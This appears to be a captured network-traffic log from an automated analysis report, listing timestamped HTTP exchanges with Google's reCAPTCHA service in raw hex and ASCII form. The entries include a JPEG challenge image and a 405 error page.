TUf3w_-RD2aZ5gTMx7m__V0z-W0jyAOk6-fn3MdM9r0C9b550B9oGlyE8NrkoiKkoNGExjNUFT8bjGaYKJF3Zkv4rn6-wf_gQjskodBHxVzWI2q651P7Ht7XxtuMCK6tiR86VU1emhwsiizS2H1j1eXgSo3BQaUZMnr6Noy0buxV71KGA31d4Vogy4AQZNOfo04Z_TnJthnFSChh914kR8Ah5xEy1-MB9fybJBN1lXwtLEmYrSQ3JaRij700Nj7
2024-08-28 11:32:10 UTC	1390	IN	Data Raw: 31 35 64 36 0d 0a 6c 42 78 33 37 36 55 43 2d 65 57 41 42 45 57 66 30 5f 76 78 77 5f 5a 42 69 46 33 44 63 79 6c 5a 45 55 67 38 62 64 69 69 43 32 33 48 68 32 61 56 79 4a 70 7a 62 62 6b 41 48 55 45 51 73 6f 5f 35 52 4c 48 6b 4e 79 62 77 6e 33 41 4c 34 52 35 78 38 33 6e 38 47 6a 4d 6e 50 54 63 4b 70 67 4d 49 36 4f 6b 78 34 56 63 7a 74 59 68 43 4c 64 6e 65 38 79 77 71 7a 5a 33 55 61 4e 66 43 34 59 33 54 5a 64 61 34 62 4a 69 6a 74 42 66 6d 5a 76 52 65 4d 37 39 6e 44 74 48 35 36 49 6c 65 76 74 67 51 6b 38 36 55 33 41 78 77 4e 6d 72 48 6a 54 48 73 72 2d 6a 6e 43 77 6b 5a 75 45 51 41 43 59 59 53 77 4f 35 4a 6f 4d 76 66 6a 79 4f 4d 55 4a 37 41 33 57 35 52 36 46 4c 71 69 33 38 61 68 61 59 6f 33 71 77 66 73 39 4c 71 46 61 32 62 4e 78 38 37 55 32 59 36 68 6b 73 39 4b Data Ascii: 15d6lBx376UC-eWABEWf0_vxw_ZBiF3DcylZEUg8bdiiC23Hh2aVyJpzbbkAHUEQso_5RLHkNybwn3AL4R5x83n8GjMnPTcKpgMI6Okx4VcztYhCLdne8ywqzZ3UaNfC4Y3TZda4bJijtBfmZvReM79nDtH56IlevtgQk86U3AxwNmrHjTHsr-jnCwkZuEQACYYSwO5JoMvfjyOMUJ7A3W5R6FLqi38ahaYo3qwfs9LqFa2bNx87U2Y6hks9K
2024-08-28 11:32:10 UTC	1390	IN	Data Raw: 55 64 5a 4b 32 5a 6a 59 6d 31 31 65 6e 6c 42 62 6c 46 31 59 6c 4a 75 53 6b 4a 42 4f 58 68 6d 54 6e 70 42 56 47 52 75 51 30 78 57 65 45 46 55 52 47 74 72 57 58 4a 6a 65 54 52 75 56 6b 78 53 53 6a 6c 33 62 56 46 43 54 54 52 79 51 6b 70 46 51 69 74 52 53 6d 38 72 56 48 46 49 61 57 35 52 56 7a 46 31 5a 44 59 79 53 47 46 30 4e 47 52 44 4d 44 68 73 4c 31 4a 6b 56 6a 59 7a 57 56 64 4c 4e 45 4a 58 65 69 74 49 53 54 68 61 55 33 42 77 56 54 56 6f 52 45 35 59 51 53 74 46 4e 47 4e 4d 4f 44 52 55 4e 48 6c 4a 65 53 39 52 62 55 56 5a 4d 58 68 56 4d 54 56 42 51 55 56 75 53 47 6c 52 59 32 67 72 51 6d 39 71 4d 6b 51 33 63 33 56 48 55 7a 4a 6d 4d 56 52 6b 62 6c 56 51 54 58 42 30 4d 33 52 56 4d 32 6c 68 5a 30 5a 5a 56 30 45 35 57 57 6b 34 4f 57 46 51 55 48 56 7a 56 30 4e 48 Data Ascii: UdZK2ZjYm11enlBblF1YlJuSkJBOXhmTnpBVGRuQ0xWeEFURGtrWXJjeTRuVkxSSjl3bVFCTTRyQkpFQitRSm8rVHFIaW5RVzF1ZDYySGF0NGRDMDhsL1JkVjYzWVdLNEJXeitISThaU3BwVTVoRE5YQStFNGNMODRUNHlJeS9RbUVZMXhVMTVBQUVuSGlRY2grQm9qMkQ3c3VHUzJmMVRkblVQTXB0M3RVM2lhZ0ZZV0E5WWk4OWFQUHVzV0NH
2024-08-28 11:32:10 UTC	1390	IN	Data Raw: 76 63 30 4e 6a 56 33 4e 78 61 32 52 31 54 54 67 32 5a 57 34 77 4f 48 4d 77 53 44 52 6c 4f 54 52 73 57 6c 46 34 55 56 6c 75 56 6b 35 4c 65 6a 64 69 65 56 64 4d 61 6d 4e 57 64 47 5a 48 5a 6e 64 59 63 32 64 61 62 6d 31 52 51 57 31 6a 5a 6b 51 35 63 30 52 57 4f 56 6c 48 4f 48 5a 54 53 7a 5a 51 65 46 6c 35 65 6b 38 30 52 30 68 55 56 30 59 33 64 30 45 76 53 57 55 79 53 6d 52 48 5a 56 46 50 61 6d 39 70 64 6d 38 31 61 6b 64 30 54 33 4e 5a 52 47 5a 53 62 6b 56 6b 4e 6c 64 4a 55 47 6b 33 61 46 64 79 4c 33 70 4e 63 6a 42 7a 59 6e 42 34 55 6b 68 46 4e 57 35 71 55 57 35 53 5a 6d 4e 35 56 55 31 49 57 44 51 72 4f 58 49 79 55 56 56 77 64 47 68 6a 54 6b 4a 77 4f 57 46 4e 54 7a 4e 69 52 57 52 51 54 7a 6b 72 59 58 5a 34 56 54 55 32 62 55 6c 68 59 58 70 55 52 6c 52 77 4e 56 Data Ascii: vc0NjV3Nxa2R1TTg2ZW4wOHMwSDRlOTRsWlF4UVluVk5LejdieVdMamNWdGZHZndYc2dabm1RQW1jZkQ5c0RWOVlHOHZTSzZQeFl5ek80R0hUV0Y3d0EvSWUySmRHZVFPam9pdm81akd0T3NZRGZSbkVkNldJUGk3aFdyL3pNcjBzYnB4UkhFNW5qUW5SZmN5VU1IWDQrOXIyUVVwdGhjTkJwOWFNTzNiRWRQTzkrYXZ4VTU2bUlhYXpURlRwNV
2024-08-28 11:32:10 UTC	1390	IN	Data Raw: 69 39 53 62 55 4e 49 4f 55 46 79 52 45 46 78 4d 32 70 72 54 57 56 4e 65 48 42 34 56 7a 49 7a 5a 33 5a 36 4e 33 4e 59 4e 44 49 76 62 7a 4a 70 56 58 4a 74 51 55 52 79 4d 55 78 30 61 55 78 36 64 33 5a 57 5a 6b 70 6d 64 48 64 45 4f 45 4e 68 54 58 64 5a 53 45 35 6a 5a 6b 39 5a 63 6b 68 6b 56 55 4d 35 4d 47 45 32 55 6d 70 35 51 57 78 78 51 54 68 59 54 79 74 6a 59 30 31 72 54 30 74 31 4d 45 64 71 62 79 74 68 4d 6b 5a 4a 63 55 68 31 4d 32 74 61 4d 79 39 48 56 47 78 4b 4d 33 59 76 63 30 5a 79 4c 7a 42 58 55 55 70 6b 59 7a 5a 6c 52 57 4a 6f 5a 44 5a 44 4b 32 35 4c 62 57 46 4e 4d 6a 5a 34 5a 31 6c 5a 52 7a 64 43 53 6c 64 53 4d 79 74 68 59 6a 64 49 4e 58 42 58 4e 55 56 34 4e 6d 35 48 63 57 35 6a 61 7a 46 6f 4e 46 64 57 57 6d 78 7a 63 6a 42 4d 52 57 4a 50 5a 7a 42 35 Data Ascii: i9SbUNIOUFyREFxM2prTWVNeHB4VzIzZ3Z6N3NYNDIvbzJpVXJtQURyMUx0aUx6d3ZWZkpmdHdEOENhTXdZSE5jZk9ZckhkVUM5MGE2Ump5QWxxQThYTytjY01rT0t1MEdqbythMkZJcUh1M2taMy9HVGxKM3Yvc0ZyLzBXUUpkYzZlRWJoZDZDK25LbWFNMjZ4Z1lZRzdCSldSMythYjdINXBXNUV4Nm5HcW5jazFoNFdWWmxzcjBMRWJPZzB5
2024-08-28 11:32:10 UTC	38	IN	Data Raw: 76 59 54 4a 6c 64 54 4e 72 4d 6c 46 68 4d 54 45 79 56 32 4e 32 63 31 68 4e 54 6b 6c 36 55 47 59 35 53 6e 46 0d 0a Data Ascii: vYTJldTNrMlFhMTEyV2N2c1hNTkl6UGY5SnF
2024-08-28 11:32:10 UTC	1390	IN	Data Raw: 32 37 66 32 0d 0a 46 4f 44 64 36 4d 56 6c 70 63 30 6c 32 4b 30 74 47 65 56 6c 49 5a 6b 46 54 5a 57 67 32 54 31 64 42 54 7a 56 56 5a 32 39 69 62 45 35 61 4e 46 4a 31 56 32 68 74 54 6d 39 6f 55 7a 52 51 5a 54 64 53 56 30 78 4f 5a 47 74 61 63 6b 4a 53 53 31 42 4e 53 6a 5a 35 61 45 46 4b 55 47 46 47 64 48 64 58 65 6e 6c 45 52 44 49 30 53 30 39 50 53 57 6c 54 55 45 46 44 4e 7a 68 77 52 6e 68 54 4d 32 4a 74 65 44 56 6a 63 48 56 56 4d 45 31 68 52 58 6c 76 53 55 6f 32 53 33 63 78 57 6a 4a 6b 55 53 39 53 4d 6c 52 5a 56 32 30 76 63 45 56 32 52 32 74 72 63 47 6c 52 51 6b 74 56 4d 6a 4e 59 65 55 46 31 59 58 52 48 63 57 35 35 51 6c 63 7a 5a 33 64 69 55 6b 74 55 65 6a 42 48 57 6b 78 72 4e 6c 46 50 56 56 46 42 65 47 46 4d 54 48 56 61 52 56 4a 71 61 55 46 53 4b 30 6c 44 Data Ascii: 27f2FODd6MVlpc0l2K0tGeVlIZkFTZWg2T1dBTzVVZ29ibE5aNFJ1V2htTm9oUzRQZTdSV0xOZGtackJSS1BNSjZ5aEFKUGFGdHdXenlERDI0S09PSWlTUEFDNzhwRnhTM2JteDVjcHVVME1hRXlvSUo2S3cxWjJkUS9SMlRZV20vcEV2R2trcGlRQktVMjNYeUF1YXRHcW55QlczZ3diUktUejBHWkxrNlFPVVFBeGFMTHVaRVJqaUFSK0lD

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:32:11 UTC	1152	OUT	GET /recaptcha/api2/payload?p=06AFcWeA5fq74Km0ZGDuqNCU_pmYFf37TI-6A0_gAenwYHSbFYwCm6V_3S4vCnGn2b1XN7f20v0UeQgXaxsudYAYuVCO_prq-RRxqi4NetwtBUtCW86jSDVGhYj6e1ubgq0DosPP4k4pDhtK5hIAWIscploEbEiIvYplfKdG0wUzcDjW-sCksCBMzNNR2gRlb6bI3VFVuFCX20&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: _GRECAPTCHA=09AM2HMKjSGX0bVN3CtRJHxJ8hI3XQBRlbnpoHDhDzoTqAHjQSwfZJvBS127XkYbnATdMcEtM869HBhnSibNTFB7c
2024-08-28 11:32:11 UTC	419	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Expires: Wed, 28 Aug 2024 11:32:11 GMT Date: Wed, 28 Aug 2024 11:32:11 GMT Cache-Control: private, max-age=30 Transfer-Encoding: chunked X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-08-28 11:32:11 UTC	6	IN	Data Raw: 36 46 31 30 0d 0a Data Ascii: 6F10
2024-08-28 11:32:11 UTC	1390	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 01 2c 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 Data Ascii: JFIFC!"$"$C,,"}!1AQa"q2
2024-08-28 11:32:11 UTC	1390	IN	Data Raw: c9 93 a6 3b d7 9b 98 fb dc bf 3f d0 f4 f2 e5 6e 6f 97 ea 5a 32 31 1c 60 81 cd 3d e7 03 ee ae 0f 20 1a a6 92 b6 fe 48 cf 4a 96 4c cd 2a 84 51 93 81 85 15 e3 4a 3c ac f4 4b 11 4f 23 21 43 31 55 5c 9d a4 ff 00 2f ad 68 e9 3a a9 b4 85 d7 cb 5d 92 00 ad eb 80 73 fe 4d 73 ee 4a 30 ce 08 f5 15 34 13 92 c1 70 33 9e 06 2a 27 4d 49 08 ed d2 da 0b ed 11 65 b6 66 86 50 d9 55 04 85 23 be ef 7f c7 a9 a4 1a 53 9d 2e 69 ae 99 10 f0 23 61 86 0c 79 1f 7b d3 8c 7f 2a cc 9f 54 8e 1d 35 ad 96 3c c9 2e 09 01 ce c5 3e b8 e0 8f e5 f8 71 51 69 57 73 df c9 22 99 09 9b ca f9 03 e0 83 8c 71 cf 4e 9f 9d 79 de ca a2 bb bd 95 c1 d8 ad 72 97 da 6c e8 24 5f 29 f1 b9 4a 30 3f a8 fa 55 f8 b5 83 79 02 db 5e e5 93 7a 90 88 08 e3 be 0e 70 3a fa 77 ac 6d 5a f6 5b ab 9c bb 49 88 d4 20 56 6c e3 Data Ascii: ;?noZ21`= HJLQJ<KO#!C1U\/h:]sMsJ04p3'MIefPU#S.i#ay{*T5<.>qQiWs"qNyrl$_)J0?Uy^zp:wmZ[I Vl
2024-08-28 11:32:11 UTC	1318	IN	Data Raw: 66 30 26 06 00 fa 57 c3 fa ee 9d 26 97 7e f6 b7 52 47 33 2a 86 59 22 c8 56 1d be f0 07 d7 b5 7d 8f ae ea ad 15 94 d3 5a 6c 9a 58 18 80 b9 23 71 18 25 73 d8 95 e4 57 cf fe 2c d1 2d ee 96 de fa 36 8c 34 67 ca 66 09 bc e0 9e 3a 7b ff 00 3a aa b5 a1 5b 67 b7 eb ff 00 0c 75 e1 17 2b 6b b9 e5 6d 14 4e 54 26 23 e3 07 27 ef 1f 5a 96 2b 2b af bc 88 e4 0e 73 b4 e3 db 9f 4a f4 28 fc 2f 0c b1 11 34 ce e4 f4 21 40 fd 0d 59 1e 1b b0 b9 81 fc d4 9d a4 49 31 84 20 64 63 ad 73 be 59 2b 23 b9 bb 6e 79 cd d4 b1 3d b9 8a 68 1b ed 0a f9 2f bb 39 e7 90 73 4c 89 59 bf 77 15 b4 e5 b2 08 01 33 9f 4e 95 e9 d1 fc 3e 4b 9f 9a 1d 13 55 91 7d 53 9c 9f ca ba 1d 2b c0 9a 95 8c 62 3d 3f 49 d5 a1 2e a3 7b 79 c3 19 1e a3 a5 60 d4 22 b7 fc 44 b5 3c 4a 79 64 92 e4 33 2c 84 f9 7e 59 52 f9 e7 Data Ascii: f0&W&~RG3*Y"V}ZlX#q%sW,-64gf:{:[gu+kmNT&#'Z++sJ(/4!@YI1 dcsY+#ny=h/9sLYw3N>KU}S+b=?I.{y`"D<Jyd3,~YR
2024-08-28 11:32:11 UTC	1390	IN	Data Raw: 1c e3 db e9 5c e4 df 14 ad 24 d4 07 d9 63 db 6e 17 66 66 6d bb 89 65 e4 6d ce 30 33 d8 e7 9f a5 78 f5 95 fc f2 2a 4e 6d e5 78 a4 66 55 eb b5 7e 51 82 40 c9 38 e4 9e d9 f4 39 ab 31 da d9 c9 70 c5 8c 22 05 4f 32 42 a4 f9 91 b1 3d 3d 01 00 1e 3a f1 df ad 63 5b 38 ac da e8 82 34 91 eb ba c7 8d ad f5 0d 2a 0b 7b 56 5f 3a 4d c9 3c 65 83 1c 2e 01 07 8c 72 4e 29 be 2e f1 5d b8 f0 cd ba c2 ad 1c 79 0a ab 9d db 24 46 03 69 3f 43 91 f8 57 94 5c b4 b6 5a 8c a2 0b 77 16 f3 a8 00 86 cb 44 d9 23 93 d7 18 3c 8a 8e eb ca d3 34 c4 b3 bd bc f3 6e 27 2a f0 b3 a0 21 db 18 03 f0 fc b8 ae 47 99 d6 a8 dd df c4 8d 15 34 8d 9f ed 37 3a 8b dd dc cf ba da 64 43 23 2f 0d 19 2c 0e 4f 7e 01 3f ae 2b 47 59 d5 5c dc 88 fc b9 65 9d ae 81 82 67 01 7c c5 5c 13 b8 13 8c 11 9f c7 a6 33 c7 27 Data Ascii: \$cnffmem03xNmxfU~Q@891p"O2B==:c[84{V_:M<e.rN).]y$Fi?CW\ZwD#<4n'*!G47:dC#/,O~?+GY\eg\|\3'
2024-08-28 11:32:11 UTC	1390	IN	Data Raw: 9f 11 56 da 2f 03 ea 5b 59 84 86 3e 8d 29 39 c3 0f ce b0 e6 76 b9 b2 8c 79 92 b1 e5 b3 f8 4e 5d 1e ea 03 a8 6a 08 cb 2b ab 15 f3 38 c2 ee 25 b9 00 83 c8 c6 32 72 07 bd 63 78 9a e9 ec 35 13 75 61 22 4b 1c bb 24 93 72 14 28 14 ed 11 9e dc e3 3e b8 c7 bd 7a 47 89 b4 2d 23 c4 7f 10 7c 2b a0 ea 5a ac d6 36 57 cb 71 13 4f 0f 2c d2 13 19 8d 72 41 1c b8 45 e9 dc 57 33 e2 58 2f 6c 2c 16 da d8 bc 89 30 31 96 b8 2a c3 05 7d 94 0f 5e d5 84 e1 2e 6e 6d cf 36 bc 7f 78 ec 71 9e 22 f1 03 f9 c0 47 0c 32 a3 00 10 f2 ca 9c 63 00 b7 7c f5 fa 7a 55 76 9a 5f 11 6a 96 ad 00 32 49 1a 16 95 9b 6c 68 8a 0f 39 e8 07 6e 4f 39 3d 6b 5f 49 d0 6d ed 60 58 2f ad 62 9a e0 3b 06 64 62 e5 b2 3e ea 80 71 b8 63 24 7f 74 66 ba 7f 0d c3 65 01 92 d2 18 74 e1 0d c9 41 23 48 81 d6 42 c5 46 40 39 Data Ascii: V/[Y>)9vyN]j+8%2rcx5ua"K$r(>zG-#\|+Z6WqO,rAEW3X/l,01*}^.nm6xq"G2c\|zUv_j2Ilh9nO9=k_Im`X/b;db>qc$tfetA#HBF@9
2024-08-28 11:32:11 UTC	1390	IN	Data Raw: 23 90 a8 cf e0 6b d9 62 f0 84 b6 d7 7e 5a f8 1e 3b a2 09 c4 a3 51 6b 85 6f 7d 91 06 23 3e 84 56 6f 8a be 18 f8 e7 59 d4 96 ef 4c d1 2d b4 bb 65 89 50 41 1d 95 ca 8c 82 49 63 98 41 24 e7 f4 ac 53 ee 8d ac fb 99 9a ae a9 16 9f 6d 24 e5 d4 88 f1 b8 83 90 3e b5 5f c2 3e 28 1a 9c f1 a4 f2 59 c9 05 c9 2b 6f 35 b2 b0 50 c3 f8 5b 24 f5 e9 db 9c 57 0d 7b 75 1c c5 9e 49 9a 40 78 01 9b 76 0d 63 e9 17 87 4a d5 0c 06 39 3f b3 2e 3f d6 90 a7 11 37 f0 bf e1 df db e9 5a 4a 5a e8 61 15 73 d4 be 2c f9 8b 6d a5 cc 8e e8 f1 bb 80 41 c1 e9 8e bf 85 70 83 50 bf 1b 55 6e 1c 81 fd e7 2c 6b ae f1 9d ff 00 db 7c 33 a6 8b 99 d2 4b b8 e5 21 c8 20 17 50 18 6f c7 bf 07 3e f5 c8 1b 8b 78 b2 5e 58 d4 0e b9 26 a2 6f 5d 0b 89 b7 e1 5d 69 ad ef 0d bd eb 37 91 33 64 3b 71 b1 8f f4 35 b1 e3 Data Ascii: #kb~Z;Qko}#>VoYL-ePAIcA$Sm$>_>(Y+o5P[$W{uI@xvcJ9?.?7ZJZas,mApPUn,k\|3K! Po>x^X&o]]i73d;q5
2024-08-28 11:32:11 UTC	1390	IN	Data Raw: bd 61 47 a4 ea 3a ca a5 d5 8d aa e9 f0 af cb fb d9 88 2c 7a 96 c0 19 f4 ed 8f 4a ef f4 7d 59 bc 37 a6 0b cb 94 4b ed 4d 54 2c b7 ef 11 96 66 03 0a aa 09 c9 c0 18 00 f0 78 af 39 26 dd ce 99 c9 5a c7 a7 78 7a cb 52 bf b1 17 17 e9 0e 9d 6c cb fb b6 9e 4d cd 28 f5 08 b9 23 f1 c1 ae 7f 5a 93 4f f0 57 83 ae fc 3b 71 6d 77 e2 04 d5 a7 72 b6 f6 68 50 a2 70 15 b7 10 76 ed da 80 1c 72 47 4e b5 ca f8 bf c6 9a b6 9d a4 0b f6 66 59 27 3b 62 0e 39 2c 46 72 7b f0 2b c9 35 1f 10 6b 1a 85 c9 b9 bc bf 9e 69 4f 1b 99 ba 7d 3d 2a fd d9 ee ee 67 18 b5 aa 47 bf 78 37 c1 7e 0a 6d 3e de ea fb 46 09 72 e8 1d 86 a5 7a d9 8c f5 c6 d8 d4 86 c7 a1 55 fe b5 e8 de 11 5f 09 59 5e 6e bb fe c8 b1 8b 04 f9 9a 7d 9f 96 e4 f6 07 28 41 fa f1 5f 19 ff 00 68 5e 1e b7 12 9f f8 11 a7 ae a3 76 3f Data Ascii: aG:,zJ}Y7KMT,fx9&ZxzRlM(#ZOW;qmwrhPpvrGNfY';b9,Fr{+5kiO}=*gGx7~m>FrzU_Y^n}(A_h^v?
2024-08-28 11:32:11 UTC	1390	IN	Data Raw: a3 cb 01 f7 0c 64 64 0c 8e 7b 1f a5 7a 3c bf 06 bc 3f a2 c3 16 a3 ad f8 a8 98 23 2a c4 f9 20 6e 3f 8b 91 fa 51 73 73 e1 0d 15 a5 d4 6c 75 1d 4e fe 28 c6 24 69 a4 56 01 ce 42 80 30 a0 02 73 9e 79 ac a5 5b da 69 4d 5f 46 53 a2 e2 bd e3 1b 4c f0 27 8b 2c f4 65 d9 6e 91 17 fd e4 82 76 d8 61 24 0e 31 8e 73 ed 56 a6 b5 f1 3f 88 2e 05 b5 ee a1 16 9f 0e 37 c5 02 ca 0b 15 e3 2e db 73 b4 7e be f5 3e a9 f1 7d 25 8e 2b 0b 6b 48 6d ad a5 5f 2e 49 43 16 60 3d 46 30 47 e1 5c ae 9b a0 78 9d ee 6e 2f e7 bf 82 de 6b 82 03 83 37 2a 80 f1 d3 d3 18 a7 4f 1b 5f 0b 4e 5e f2 8b 7b 5f f4 fe bb 19 e2 29 52 d3 97 53 b4 b6 f0 76 8f 6b ae 45 79 a8 6a b0 3f 95 17 d9 e2 58 ed c2 90 d8 24 b1 c7 56 3f ca b6 87 85 b4 39 d1 67 93 cc 9d 53 07 01 80 38 f7 c6 78 af 27 87 c2 fa dc a2 3b 87 d6 Data Ascii: dd{z<?#* n?QssluN($iVB0sy[iM_FSL',enva$1sV?.7.s~>}%+kHm_.IC`=F0G\xn/k7*O_N^{_)RSvkEyj?X$V?9gS8x';
2024-08-28 11:32:11 UTC	1244	IN	Data Raw: db 8c 10 4f a5 5f 57 28 e8 9f 74 63 80 3a 57 a1 ec 69 a7 74 89 f6 f5 24 bd e7 73 c4 bc 25 fb 39 59 68 9a 16 af a4 dc 78 97 ed f0 ea 92 db cb 20 36 1b 02 18 59 c8 c0 f3 0e 72 1c 8e b5 da e8 df 09 fc 3f a4 05 fb 0c 56 d1 32 92 c1 85 be 48 27 be 4b 66 bb ff 00 3e 2d db 43 82 7d a9 e0 e7 91 d2 b3 a9 87 85 4f 89 1a 42 ab 8f c2 ce 2e f7 c0 f2 4d 64 d6 d0 ea d1 c0 1b 03 3f 64 dd c7 7e 0b 57 07 e2 0f 81 1a ae a9 6f 0d b4 5f 10 66 b4 b7 8f 9f 29 34 e2 ca 5b d7 fd 75 7b 81 a2 94 30 f4 e1 f0 a2 a7 56 73 dd 9f 3a 0f d9 a3 50 2f 1c 92 fc 48 b8 99 a3 6d c9 bf 4d 62 14 fa 81 e7 f1 db a7 a5 5f 83 f6 72 07 4c d4 2d 2f 3c 64 67 7b d6 8d 9a 58 f4 b5 8b 66 c2 71 80 24 eb c9 c9 cf 35 ef 94 55 fb 38 f6 33 3e 6a 7f d9 4e dd 8e 57 c6 cc 39 27 9d 2f 24 ff 00 e4 6a ac 34 79 d4 b7 Data Ascii: O_W(tc:Wit$s%9Yhx 6Yr?V2H'Kf>-C}OB.Md?d~Wo_f)4[u{0Vs:P/HmMb_rL-/<dg{Xfq$5U83>jNW9'/$j4y

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:32:11 UTC	610	OUT	GET /recaptcha/api2/reload?k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: _GRECAPTCHA=09AM2HMKjSGX0bVN3CtRJHxJ8hI3XQBRlbnpoHDhDzoTqAHjQSwfZJvBS127XkYbnATdMcEtM869HBhnSibNTFB7c
2024-08-28 11:32:11 UTC	743	IN	HTTP/1.1 405 Method Not Allowed Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 28 Aug 2024 11:32:11 GMT Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d" Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]} Allow: POST Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-08-28 11:32:11 UTC	647	IN	Data Raw: 36 37 36 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 Data Ascii: 676<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;c
2024-08-28 11:32:11 UTC	1014	IN	Data Raw: 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 Data Ascii: round:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only 